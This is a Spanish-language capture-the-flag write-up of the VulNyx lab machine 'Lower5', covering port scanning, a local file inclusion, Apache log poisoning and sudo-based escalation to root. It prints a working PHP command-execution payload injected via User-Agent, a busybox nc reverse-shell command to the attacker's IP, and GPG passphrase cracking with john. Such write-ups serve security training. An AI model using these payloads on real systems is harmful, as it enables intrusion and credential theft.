cd ~/blog

~/writeups/vulnyx/32-lower5.md

32 - Lower5

low Linux vulnyx 08-11-2025
Local File Inclusion (LFI)Apache log poisoning (RCE)sudo bash Privescsudo pass + GPG passphrase cracking
vulnyx.com

~1 min de lectura


Identificamos la IP de la máquina víctima:

 arp-scan --interface=wlan0 --localnet | grep PCS | awk '{print $1}'
10.207.245.101

Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 10.207.245.101
[sudo] contraseña para wh01s17:
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-08 14:27 -0300
Nmap scan report for 10.207.245.101
Host is up (0.00022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:9C:81:19 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds
 nmap -sCV -p 22,80 -oN 02-targeted.txt 10.207.245.101
Starting Nmap 7.98 ( https://nmap.org ) at 2025-11-08 14:27 -0300
Nmap scan report for 10.207.245.101
Host is up (0.00037s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: vTeam a Corporate Multipurpose Free Bootstrap Responsive template
|_http-server-header: Apache/2.4.62 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.36 seconds

Al navegar el sitio, los enlaces del navbar cargan contenido con un parámetro inc, lo que delata un LFI. Lo confirmamos leyendo /etc/passwd:

 curl 'http://10.207.245.101/page.php?inc=/etc/passwd' | grep bash
root:x:0:0:root:/root:/bin/bash
low:x:1000:1000:low:/home/low:/bin/bash

Fuzzeamos rutas accesibles vía LFI y encontramos el log de Apache:

 ffuf -u 'http://10.207.245.101/page.php?inc=FUZZ' -w ~/Documents/wordlists/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -fw 5
...
/var/log/apache2/access.log [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 6ms]
...

Aprovechamos el LFI para hacer log poisoning: inyectamos código PHP en el User-Agent (que queda registrado en el log) y luego incluimos el log, ejecutando el comando pasado por cmd:

 curl -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://10.207.245.101/"

 curl 'http://10.207.245.101/page.php?inc=/var/log/apache2/access.log&cmd=id'
...
10.207.245.35 - - [08/Nov/2025:19:58:14 +0100] "GET / HTTP/1.1" 200 11906 "-" "uid=33(www-data) gid=33(www-data) groups=33(www-data)
...

Convertimos la ejecución en una reverse shell accediendo a http://10.207.245.101/page.php?inc=/var/log/apache2/access.log&cmd=busybox%20nc%2010.207.245.35%201234%20-e%20/bin/bash:

 ncat -nlvp 1234
Ncat: Version 7.98 ( https://nmap.org/ncat )
Ncat: Listening on [::]:1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.207.245.101:50938.
script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@lower5:/var/www/html$

La escalada se hace en dos saltos sudo. Primero, www-data puede ejecutar bash como low:

www-data@lower5:/home$ sudo -l
Matching Defaults entries for www-data on lower5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User www-data may run the following commands on lower5:
    (low) NOPASSWD: /usr/bin/bash

www-data@lower5:/home$ sudo -u low bash
low@lower5:/home$

Ahora low puede ejecutar pass (el gestor de contraseñas estándar de Unix) como root:

low@lower5:~$ sudo -l
Matching Defaults entries for low on lower5:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User low may run the following commands on lower5:
    (root) NOPASSWD: /usr/bin/pass

Listamos el almacén de contraseñas, que contiene una entrada root/password:

low@lower5:~$ sudo /usr/bin/pass
Password Store
└── root
    └── password

Al intentar leerla, pass (que cifra con GPG) pide la passphrase de la clave secreta:

low@lower5:~$ sudo /usr/bin/pass root/password
                   lqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqk
                   x Introduzca frase contraseña para desbloquear la clave secreta OpenPGP: x
                   x "administrator (password) <admin@lower5.nyx>"                          x
                   x clave de 1024-bit RSA, ID E70EBB1C2CFFB642,                            x
                   x creada el 2025-04-09 (ID de clave primaria 9AD17885DA2449A1).          x
                   x                                                                        x
                   x                                                                        x
                   x Frase contraseña: ____________________________________________________ x
                   x                                                                        x
                   x          <OK>                                         <Cancelar>       x
                   mqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqj

En el home de low hay un root.gpg; lo transferimos a nuestra máquina y crackeamos la passphrase con john:

 gpg2john root.gpg > hash

 john -w=/home/wh01s17/Documents/wordlists/rockyou_utf8.txt hash
...
Password1        (administrator)
...

Volvemos a ejecutar pass con la passphrase descubierta para revelar la contraseña de root:

low@lower5:~$ sudo /usr/bin/pass root/password
r00tP@zzW0rD123

Y nos autenticamos como root:

low@lower5:~$ su root
Contraseña: r00tP@zzW0rD123
root@lower5:/home/low#

Obtenemos la flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados